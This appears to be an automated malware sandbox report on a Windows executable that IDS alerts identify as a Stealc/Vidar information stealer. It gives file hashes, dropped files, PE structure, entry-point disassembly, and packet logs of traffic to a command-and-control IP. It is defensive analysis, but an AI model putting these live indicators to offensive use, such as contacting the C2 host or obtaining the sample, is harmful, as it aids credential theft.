Entropy (8bit):	1.8212223528158107
Encrypted:	false
SSDEEP:	768:zcS5IZR/1geyG7yS0OWUTX8nxGES9NmSZXeMZ0FV56IZ2O:zDrOXMl2MSZXeMZ0FV56IZ2O
MD5:	96CC2527E5E5DE10C681C387BED7795E
SHA1:	715C0FEA4EF2C233CA73DCFF772F7A25F7E8D710
SHA-256:	CC877BF0C5D1470ABE51ED03FEAA5D9255B208E65AD9177E4B08CFB4DD1CAB1F
SHA-512:	03DB0604FC17F9422AAC917388A53DB0D207C4D99A384A863CE25F2C6CC8A57517F34AB87A701B934008E2385DCFF58676B043904CA56E50A13D9BCFABC6D80E
Malicious:	false
Preview:	MDMP..a..... .......m..g........................p................M..........T.......8...........T............8..............\$..........H&..............................................................................eJ.......&......GenuineIntel............T...........Q..g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA413.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6302
Entropy (8bit):	3.7214854341088333
Encrypted:	false
SSDEEP:	192:R6l7wVeJX26bYbDJwNQiVprP89bJcsfcE4jm:R6lXJG6bYbDJe7YJvfcm
MD5:	59867EDAECECB7FB12CB4307B8070E23
SHA1:	FEEF25A6D54EE30AFE68EED5D958A253251076FB
SHA-256:	961316814753AA8849EAB23FB16DBB13816D745C9AA51CD22ACB1D49D772F7F1
SHA-512:	D1F1EDC08FC642B6CC97C31464800E36BD541268F118198CE76A18963A3EB1B16018E82511E20AE5AF9BDDEA45EF15570FC608AD9209C4264A38F38CACB669E5
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA443.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4642
Entropy (8bit):	4.459540109076187
Encrypted:	false
SSDEEP:	48:cvIwWl8zsyJg77aI9t6WpW8VY75Ym8M4J0DF6a+q8+ydmL5d:uIjfAI7b77VFJPaImL5d
MD5:	5D84CB0CFB6CA4B2A85736D7AF6119F6
SHA1:	068441620D535EC9E1E4A0AACDE0AB05B2A62A9B
SHA-256:	E228F56127F92696C548A717809BAE9A5AD8190A6191B7508AB26B08961654BA
SHA-512:	E6E673BAA64082C5D885F55F2395BE1F0DC49EF0CA33B069D6E2B62BD6B36A33176B8DF79E417E29318A76525384B2B6098879B3A98C067A149EA414A9BAA6D3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ISO-8859 text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:w:w
MD5:	5D53C9A2990BE15A29CAF5B633460BD9
SHA1:	369952FD3984103E76D9CCA3F6F01D70333076B1
SHA-256:	93BB5500C5D35D56C01A432B9514D7A0953955531A5ACA8A7D8BDB8543FD20D7
SHA-512:	653198CC1EE9BFFB842CD2342453FBDB1868C352F4368EB9554B9E7131F7AACBCDA4A571C449E20E94A1E8FB565B237192289F135BFDF8294B782C430159CCEA
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469652544596662
Encrypted:	false
SSDEEP:	6144:FIXfpi67eLPU9skLmb0b4OWSPKaJG8nAgejZMMhA2gX4WABl0uN5dwBCswSbF:mXD94OWlLZMM6YFHT+F
MD5:	86EC46900A0302728E592F4B03CB7305
SHA1:	D8AE3E7DF8F295B06B8BB3E5199EC71D06494318
SHA-256:	594B85DF20D4DE82854B9B5AF80A7EDBE3471A0F29AA391CD60BA210D22CC337
SHA-512:	4B287EF57B7B2E10795280F47774F2604BE7AA5A559DEE56CB2D7E9E1C48B9CEFA8FD33D6BD442F246DBCFD6451791D1FA07C1F479E4FB73AD625CF75DAFD9AF
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:Y(i................................................................................................................................................................................................................................................................................................................................................D+>]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.746698676013429
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	lCVFGKfczi.exe
File size:	584'704 bytes
MD5:	b84100c670bb19e92bfb62423048aa43
SHA1:	592f3aef7ad93db6527d8e9d06b2ebbae1a51a79
SHA256:	7823532217e8b06b102734023019188833b3e0ae711c3dc6f9cb437d8c48d14b
SHA512:	25610d8053a29ef458a690e1435008cbdfd990e2548dbad0db929e539a594c61c144f0025f4b74788324d507af37c66dde302ba513f5279d4f2b37ec5ab8a953
SSDEEP:	12288:HcEcpXoWDMr3QZJG6/vrB7JOpf/4Xx8Yl6E0nfhLZ4S:HOXo5Q/vXipYXx3l65ntK
TLSH:	01C4F11171C0C077D9B7153256E19A78AE3DB8B00E61AD9F6B950F7F4F30181EB21AAB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=.9.y.WUy.WUy.WU..TTu.WU..RT..WU..STl.WU..VTz.WUy.VU!.WUilTTm.WUilSTk.WUilRT4.WU1m^Tx.WU1m.Ux.WU1mUTx.WURichy.WU...............

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x406f52
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x670409F6 [Mon Oct 7 16:19:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d10af643340e1121562abe3e6bd5b0e1

Entrypoint Preview

Instruction
call 00007FD760B9B110h
jmp 00007FD760B9A67Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007FD760B9A81Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007FD760B9A80Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007FD760B9A80Eh
add edx, 28h
cmp edx, esi
jne 00007FD760B9A7ECh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007FD760B9A7FBh
push esi
call 00007FD760B9B424h
test eax, eax
je 00007FD760B9A822h
mov eax, dword ptr fs:[00000018h]
mov esi, 0048E944h
mov edx, dword ptr [eax+04h]
jmp 00007FD760B9A806h
cmp edx, eax
je 00007FD760B9A812h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007FD760B9A7F2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007FD760B9A809h
mov byte ptr [0048E948h], 00000001h
call 00007FD760B9AABAh
call 00007FD760B9D9D7h
test al, al
jne 00007FD760B9A806h
xor al, al
pop ebp
ret
call 00007FD760BA6439h
test al, al
jne 00007FD760B9A80Ch
push 00000000h
call 00007FD760B9D9DEh
pop ecx
jmp 00007FD760B9A7EBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0048E949h], 00000000h
je 00007FD760B9A806h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2c6c0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x90000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x91000	0x1acc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2abc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2ab00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x23000	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x210f0	0x21200	da6933d9163c91b410d0c575582c5aee	False	0.5865197523584905	data	6.664966733928765	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x23000	0x9d78	0x9e00	65c30f2171d22472fa06dae333a28d71	False	0.4352007515822785	data	4.9601306801628615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2d000	0x62570	0x61800	a9188688ff3a2e1ca1a0cf02772126a3	False	0.9919471153846153	DOS executable (block device driver \377\377\377\377,32-bit sector-support)	7.993070911581116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x90000	0x3d8	0x400	af649139f3e8354e0bee38868a95abf6	False	0.439453125	data	3.276619243827775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x91000	0x1acc	0x1c00	c3d526dfd91d01742bffceba6eaa40c5	False	0.7260044642857143	data	6.386834799905597	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x90058	0x380	data	English	United States	0.46205357142857145

Imports

DLL

Import

KERNEL32.dll

AttachConsole, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T18:46:10.427105+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	95.164.90.97	80	192.168.2.4	49743	TCP
2024-10-07T18:46:34.937813+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49743	95.164.90.97	80	TCP
2024-10-07T18:46:35.930186+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.164.90.97	80	192.168.2.4	49743	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 18:46:13.131978035 CEST	49675	443	192.168.2.4	173.222.162.32
Oct 7, 2024 18:46:32.458460093 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:32.463567972 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:32.463660002 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:32.463808060 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:32.469723940 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:33.638705015 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:33.638782978 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:33.642240047 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:33.649979115 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:34.275516033 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:34.275593996 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:34.276621103 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:34.282388926 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:34.937433958 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:34.937813044 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:34.937990904 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:34.938055038 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:34.939420938 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:34.945060968 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929681063 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929750919 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929760933 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929873943 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.929874897 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.929874897 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.929909945 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929923058 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929944992 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.929981947 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.929981947 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.929981947 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.930186033 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.930244923 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.930454969 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.930502892 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.931319952 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.936810017 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.936852932 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.936862946 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.936878920 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.936913013 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.937052011 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.937107086 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.937391043 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:35.937446117 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:35.939052105 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:36.578031063 CEST	80	49743	95.164.90.97	192.168.2.4
Oct 7, 2024 18:46:36.578136921 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:41.503042936 CEST	49743	80	192.168.2.4	95.164.90.97
Oct 7, 2024 18:46:45.796947002 CEST	80	49724	217.20.57.23	192.168.2.4
Oct 7, 2024 18:46:45.797116041 CEST	49724	80	192.168.2.4	217.20.57.23
Oct 7, 2024 18:46:45.797236919 CEST	49724	80	192.168.2.4	217.20.57.23
Oct 7, 2024 18:46:45.802237034 CEST	80	49724	217.20.57.23	192.168.2.4
Oct 7, 2024 18:47:07.239291906 CEST	49747	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.239326954 CEST	443	49747	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:07.239413977 CEST	49747	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.239712000 CEST	49747	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.239728928 CEST	443	49747	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:07.313772917 CEST	443	49747	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:07.316077948 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.316104889 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:07.316181898 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.316668987 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:07.316679001 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.115036011 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.115211964 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.118674040 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.118702888 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.118994951 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.126542091 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.171402931 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.232496977 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.232531071 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.232552052 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.232634068 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.232656956 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.232722044 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.316797972 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.316834927 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.316900969 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.316931963 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.316956043 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.316983938 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.321249962 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.321274042 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.321331024 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.321351051 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.321377993 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.321403027 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.403393984 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.403430939 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.403660059 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.403681040 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.403736115 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.405711889 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.405735970 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.405802011 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.405814886 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.405860901 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.407406092 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.407428980 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.407489061 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.407497883 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.407543898 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.447652102 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.447685957 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.447766066 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.447792053 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.447818041 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.447845936 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.505852938 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.505886078 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.506000042 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.506030083 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.506086111 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.508203983 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.508228064 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.508290052 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.508302927 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.508341074 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.508373022 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.510092020 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.510117054 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.510169029 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.510179043 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.510216951 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.510241032 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.512566090 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.512590885 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.512659073 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.512669086 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.512717009 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.514379025 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.514403105 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.514463902 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.514472961 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.514523029 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.515913963 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.515938997 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.515988111 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.516012907 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.516021013 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.516062021 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.516062975 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.516110897 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.516319036 CEST	49748	443	192.168.2.4	13.107.246.45
Oct 7, 2024 18:47:08.516345978 CEST	443	49748	13.107.246.45	192.168.2.4
Oct 7, 2024 18:47:08.516357899 CEST	49748	443	192.168.2.4	13.107.246.45
